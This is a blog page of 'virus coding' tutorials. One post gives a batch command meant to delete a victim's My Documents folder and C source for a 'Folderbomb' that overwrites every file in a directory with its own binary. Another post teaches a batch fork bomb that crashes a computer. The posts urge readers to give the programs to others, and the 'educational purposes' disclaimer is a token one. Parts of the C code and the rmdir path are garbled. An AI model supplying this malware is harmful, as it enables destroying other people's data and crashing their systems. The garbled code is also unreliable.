Download

Download

Featured Posts

Featured Articles
All Stories
Showing posts with label VIRUS CODING. Show all posts
Showing posts with label VIRUS CODING. Show all posts

VIRUS CODING PART 2


HOW TO CREATE VIRUS FOR WINDOWS/LINUX/OTHERS OS


Run this on your own responsibility*/



VIRUS CODE-1


IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.
Run this on your own responsibility*/
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
4:31 PM - By Reetha 0

Create your own Virus using V-Maker free mini project


Create your own Virus using V-Maker | how to create a virus


Virus coding is not as tough as you think its easy , Today Viruses are coded in various languages but the best are coded in Assembly and C. If i start writing tutorials on Assembly and C . I am sure most of my blog readers will never ever visit my site . 
As most of my blog readers are beginners so to make it easy for them .In this article  i will teach you how to codeBatch File viruses which are the easiest to write and understand And for the intermediates who already know this stuff i will be adding links at the end of the post from where you can learn High level Virus Coding 

I believe all my bog readers know batch file programming .If not i would suggest
you to google on this subject . So in this article we will see a very common and famous 
batch file virus "Fork Bomb "


Disclaimer :I will not be held responsible for the actions of people who read 
this tutorial. This tutorial is for educational purposes only.And does not in 
anyway encourage illegal activity .

Fork Bombing :-

Fork bombing is nothing but calling a program by itself again and again with a infinite loop 
and making the system to crash by popping up hundreds of windows on the screen.


@echo off 
:loop 
start 
Call fk.bat
Goto loop

Now copy paste the above code in a notepad and save it as fk.bat . Now when you run 
this virus (program ) it will open new CMD (command prompt) again and again 
(because of the loop command )till the computer crashes .So don't run this on your 
computer if your so curious then try running it on a VM machine (virtual machine )

Note :- You can also open any other application like the explorer by entering "explorer" instead of "start" in the program .

For some further reading and research on viruses you can have
look at following links

1 .Vx heavens -Best place to learn virus coding
VXHEAVENS.COM

2.Viruswriting blog - Another great place to learn virus coding
VirusWriting.blog

Hope you enjoyed this article , For further doubts and clarification please pass your comments

Read more: http://www.101hacker.com/2011/06/introduction-to-virus-coding.html#ixzz1oEsF93lF
4:27 PM - By Reetha 0

Labels

AI PROJECTS (8) ALL DEPT (42) BCA (22) BE (13) BSC (20) BTECH (17) C PROJECTS (4) C#.NET (19) C++ PROJECTS (2) CHEMISTRY (3) CIVIL (25) CSE (94) DIPLOMA (22) DOWNLOADS (60) ECE (37) EEE (39) FINAL YEAR PROJECTS (30) HOW TO (58) HTML PROJECTS (4) IEEE PROJECTS (108) IT (85) MATLAB PROJECTS (8) MBA (1) ME (19) MINI PROJECTS (97) MSC (17) MTECH (18) MYSQL PROJECTS (6) NETWORK PROJECTS (7) OTHER PROJECTS (67) OTHERS (28) PAPER PRESENTATION (4) PG (18) PHP PROJECTS (7) PROJECTS (5) SOURCE CODES (22) SYSTEM PROJECTS (15) UG (17) VB PROJECTS (15) WHITE PAPER (19) mca (73) mech (4)

Blog Archive

Total Pageviews

Discussion

Followers

Powered by Blogger.
back to top
Don't Forget To Join US Our Community
×